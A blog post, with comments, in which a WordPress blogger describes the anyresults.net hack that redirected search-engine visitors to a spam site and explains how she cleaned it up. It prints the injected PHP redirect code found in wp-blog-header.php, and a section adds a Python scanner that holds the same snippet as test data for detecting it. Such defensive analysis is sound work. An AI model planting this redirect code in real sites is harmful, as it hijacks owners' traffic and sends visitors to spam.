
Help for the anyresults.net Hack

My biggest blog was hacked recently. I “should” have caught on to it much more quickly but I didn’t. When traffic dropped by about 1000 people a day and my income majorly plummeted I started to take notice but I was at a loss as to how to explain it. I did see a serious lack of Google traffic so I thought maybe I got slapped for some reason. I don’t utilize any blackhat SEO methods but my content has been getting ripped off and republished left and right lately. My SERPs remained the same though, so I was VERY confused.

Then a blog reader mentioned to me that when she clicked on a link to my blog in the Google reader she would be redirected to a site called anyresults.net. She even researched it a bit and sent me a link to a discussion about this very issue. It is a hack affecting thousands of WordPress blogs. Basically it steals all of your search engine traffic…via AOL, Google, Yahoo, MSN, you name it. If a search result brings up a link to your site the visitor would be redirected to anyresults.net and not your site. I erased my cookies and tried it myself and sure enough I was redirected every time. I could even search for my blog by name and be redirected. By now I was FURIOUS. I lost some major moola this week because some jerk-off stole traffic that should have been mine…Adsense, affiliate income, ad networks…all were suffering.

After I started looking for solutions I also found some people saying that Google ended up banning them for redirecting to a spam site! They got hacked and then slapped…talk about an insult after injury.

To get rid of the hack I tried the “solution” found here. It was useless. Mostly this thread seems full of people who assume you were too stupid to upgrade and that is why you got hacked. I was hacked while running the latest version, 2.5.1, so there goes that theory. I looked in my MySQL database for an image being used as a plugin and there wasn’t one. I also deleted this string: rss_f541b3abd05e7962fcab37737f40fad8. It did nothing. I even deactivated all plugins and the problem was still there so clearly it is NOT a plugin issue.

Just like this blogger I did find this code in my wp-blog-header.php file:

<?php
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

This is NOT supposed to be there. I deleted it but this in itself did not fix the issue. So I copied over all the files in the main WP directory with fresh, clean files and the problem was fixed. I wish I had known about this before I scoured my database and reinstalled a clean version of each plugin. Hope it helps some others affected by this attack.

While I was working this out I also added a blank index file to my plugins folder so people can’t see what plugins I am using and find back doors. I also deleted all of my users and checked my permission settings. Hopefully my traffic will get back to normal and I can avoid further attacks…what a major pain in the neck.

Now I need to check out all my other blogs.
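For checking other installs for the same injection, here is an added example (not part of the original post, and not WordPress code) that scans a directory of PHP files for a Location redirect conditioned on HTTP_REFERER and decodes any base64 string literal to show the hidden destination. The function names and the clean sample file are assumptions made for illustration; the infected sample is the snippet quoted above.

```python
import base64
import re
import tempfile
from pathlib import Path

# Test data: INJECTED is the snippet quoted in the post; CLEAN is a constructed stand-in.
INJECTED = r'''<?php
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>'''
CLEAN = "<?php\nrequire_once('wp-load.php');\nwp();\n"
B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
REDIRECT = re.compile(r'header\(\s*["\']Location:', re.I)

def decode_literals(source):
    """Decode string literals passed to base64_decode(); skip malformed ones."""
    out = []
    for blob in B64_CALL.findall(source):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue
    return out

def scan_source(source):
    """Findings for one PHP file; empty unless it redirects based on the referrer."""
    if not (REDIRECT.search(source) and "HTTP_REFERER" in source):
        return []
    return ["Location redirect conditioned on HTTP_REFERER"] + [
        "hidden string: " + s for s in decode_literals(source)]

def scan_tree(root):
    """Map each suspicious .php file under root (relative path) to its findings."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[str(path.relative_to(root))] = found
    return hits

def demo():
    """Scan a throwaway tree holding one infected and one clean file."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("wp-blog-header.php", INJECTED), ("index.php", CLEAN)):
            Path(root, name).write_text(body, encoding="utf-8")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

A match is a lead for manual review rather than proof of compromise, and a clean scan does not rule out other modified files, which is why replacing the core files with fresh copies was the step that removed the redirect here.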

Comments

  1. Carrie Lauth says:

    wow Tiffany. That’s scary – but glad you got it worked out and thanks for sharing this. What do you suppose can be done, if anything, to prevent this issue?

    Would a more frequent password reset do it? Or is it someone that can get around even that?

    Carrie Lauth’s last blog post..Are There Cons to Being a Work At Home Mom?

  2. WordPress claims that on older versions of WP someone only need register for a user account (which anyone can do) to have access to hack. They insist someone must have hacked weeks ago before I upgraded and then only decided to start profiting now. I have my doubts.

    I did change my password though.

  3. Thanks for posting this. It helped me track down problems on many of my own sites. After trial and error, I figured out that wp-blog-header.php is the culprit in the WP directory, but this hack leaves plenty of malicious footprints. My methods here:

    http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/

    Thanks!

  4. Hey Tiffany, so sorry this had to happen and glad you have cleaned it up. Just wanted to add one more thought. Although this sounds like a WP vulnerability, based on my experience it could be something else too.

    For example keystroke loggers. People gain access to your FTP and cPanel access after logging the username and passwords on a vulnerable computer. I blogged about that once and will be glad to send you the URL if you want.

    Lynette Chandler’s last blog post..WordPress Does Not Like Special Characters

  5. Raza Virk says:

    plz help me my this ID was hacked some one plz help me what
    can i do now

Trackbacks

  1. [...] recent anyresults.net hack to one of my blogs really made me evaluate a traffic strategy that does not include search engines, [...]

  2. [...] Tiffany Washko – Help for the anyresults.net Hack [...]

  3. [...] have had a rough month being a WAHM this month. If you recall my blog was hacked and my search engine traffic was being redirected to a spammer site. I thought that was the end of [...]
